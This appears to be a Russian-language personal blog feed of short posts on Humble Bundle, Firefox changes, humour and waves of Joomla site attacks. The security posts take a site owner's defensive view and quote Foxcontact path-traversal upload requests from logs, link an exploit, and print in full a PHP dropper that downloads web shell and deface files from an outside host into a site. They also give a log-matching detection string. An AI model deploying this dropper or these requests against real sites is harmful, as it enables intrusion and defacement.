Humble Bundle был куплен IGN-ом. Целиком и напрочь. IGN обещали "ничего не менять...в ближайшее время".
Короче, RIP Humble Bundle
Линкота - http://blog.humblebundle.co...ning-forces-with-ign
Когда вам про что либо говорят что оно "цветет и пахнет" отвечайте что "плесенью и трупом".
Если вы открываете книгу и там есть текст - это "русским по белому".
А если там чистые страницы - это "белорусским по белому"!!!
Ищу такое "Семь смертных грехов" в Гугле а он рраз и аниму Nanatsu no Taizai - The Seven Deadly Sins выдает.
Черт, Скайнет уже здесь.
Мозилла такая тормозилла...
https://bugzilla.mozilla.or...w_bug.cgi?id=1407115 Don't ship run-mozilla.sh
И замечательный комментарий от разработчиков - "The script has not been necessary for years to start Firefox"
ДЖВА ГОДА ЖДАЛИ.
Офигенная фамилия у нового главы правительства Швадодной Каколонии - Пучдемон. Толи Путч-демон, толи от слова "пучить"...
Вот я чего не могу понять...
1) Почему все эти кулхацкеры, дефейсящие сайты - часто какие нибудь сраные курды, палестинцы, прочие арабы?
2) Оставляя вот такую херню - http://latallaperfecta.com.mx/ - чего они вообще пытаются добиться?
Ну супер, ломанули, готовым эксплойтом само собой, 10 раз просроченный движек, понаписали своё "свободку курдиштану", дальше-то что?
Задача напугать ежа голой задницей? We are Kurdish-Kurdish Hacker, блеа....
3) А что, уебмастера не замечают что у них там курдисран расцвел?
Охлол - Микрософт решил похоронить Windows Phone, говорят что не смотря на все усилия не удается подвинуть Еппл и Ведроид. Так что, все кто собираются купить Вондовс Телепон....продолжайте нести ваши денежки :)
А еще сейчас волна хакинга Джумлы через Foxcontact.
хакают так - "GET /components/com_foxcontact/lib/file-uploader.php?cid=2&mid=2&qqfile=/../../../../by.htm HTTP/1.1" 500 185 "-" "Mozilla/5.0"
(не работает, лол)
Или так - "GET /index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=2?cid=2&mid=2&qqfile=/../../../../by.htm HTTP/1.1" 200 491 "-" "Mozilla/5.0"
ссылочка на эксплойт - https://github.com/2inf3rna...ob/master/exploit.py
Проверьте себя. Загуржает в components/com_foxcontact/ файл _func.php - форму загрузки на сервер скриптов.
П.С. НЕ работает если загрузка аттачей в форме выключена.
Опять кулхацкеры вылезли. Снова пытаются через SimplePie хакать.
Вот такой вот код выполнить хотят
"<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/tmp/vip.php" ;
$text = http_get('http://kylebufis.com/vip/vip.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/tmp/upxx.php" ;
$text2 = http_get('http://kylebufis.com/vip/uploader.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .\n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/x.txt" ;
$text3 = http_get('http://kylebufis.com/vip/deface.txt');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/tmp/check.php" ;
$text4 = http_get('http://kylebufis.com/vip/check.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/x.php" ;
$text5 = http_get('http://kylebufis.com/vip/deface.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('#');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);
@unlink(FILE);
?>
Рекомендую почекаться в логах на "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\0\0\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:2934:\"eval"
Ну вот смех смехом, а некоторые из используемых мной аддонов начали потихоньку "апгрейдиться" до WebExtention. Даже тот же NoScript уже дошел до того, что стал устанавливаться-обновляться без перезапуска браузера. MyWOT, который после скандала с утечкой юзерских данных казалось бы умер вдруг ожил, обновился и вернулся из (з)ада. Так что...
The resource at “https://api-maps.yandex.ru/...age.full&lang=ru-RU” was blocked because tracking protection is enabled.
Опять они за старое.
Если поставить на Джумлу плагин поддержи XML-RPC (http://www.joomler.net/down...x-updated-v207.html) и влючить плагин RSD (добавляет теги в страницу указывающие на XML-RPC endpoint), то всякие хакботы станут думать, что у нас стоит Wordpress и будут впустую ломиться по несуществующим адресам.
Для дополнительного удовольствия можно добавить в Жумлу некоторые характерные для Вротпреса файлы-заглушки (например wp-login.php), чтобы их точно запутать.
Очередной шаг "Мы-не-Хром"а к тому чтобы стать клоном Хрома - теперь если вкладок много они сжимаются в микросокпические микротабики на оторых ничего роме иони не видно.
Holy shit! Измените browser.tabs.tabMinWidth на 80 или 100 чтобы вернуть как было.
Старые XUL аддоны не будут поддерживаться Мозиллой дольше чем ESR 52 - то есть до середины лета 2018-ого. После этого будет выпущен новый ESR 59 (уже безподдержки XUL расширений), а XUL из каталога AMO будут постепенно скрыты.
Впрочем, что-то там непонятное на тему XUL хочет пилить PaleMoon и еще знамя XUL хочет подобрать Waterfox, успехов обоим, чо.
Сейчас в хамбле - https://www.humblebundle.com/gems-bundle-2 за 1$ дают офигенную игру - Count Lecanor. Крипота 100%, как раз ночью играть.
Начинается как обычная такая сказочка братьев Гримм, молодой парубок сдувает из дому в поисках "щасья", шарится по лесу, помогает старушкам там и пастушкам, а потом ВДРУГ НОЧЬ, ТЬМА, ОДЕРЖИМЫЕ ЗЛОМ ЗВЕРИ РАЗОРВАЛИ ВСЕХ НА ЧАСТИ ВОСХВАЛЯЯ САТАНУ, КИШКИ И ШМАТЫ ТЕЛ ПОВСЮДУ, РЕКА КРОВИ, ТАИНСТВЕННЫЙ ЗАМОК ПОЛНЫЙ МОНСТРОВ ЖАЖДУЩИХ ПОЖРАТЬ ТВОЮ ДУШУ, ЗЛОБНЫЕ ЛОВУШКИ И СМЕРТЬ ПОВСЮДУ!
Рекомендую.
Вышла 3.8.1 - вот теперь можно начинать тестировать :)
!! #1403935 [Core:Graphics]-Enable OMTP by Default on Windows nightly [Uns][[gfx-noted]] !!
Включили таки OMTP (Off main thread painting) на виндушечке (скрежет зубовный) - по идее, это должно дать довольно заметный прирост в скорости, так как трисовка теперь будет в другом потоке идти. OMTC (композитор на другом потоке) включили еще в версии примерно 40-ой и это весьма так ускорило вещи визуально.
Хотелось бы конечно и под другие платформы...
Ах да, раньше OMTP был extra crashy - хз как сейчас.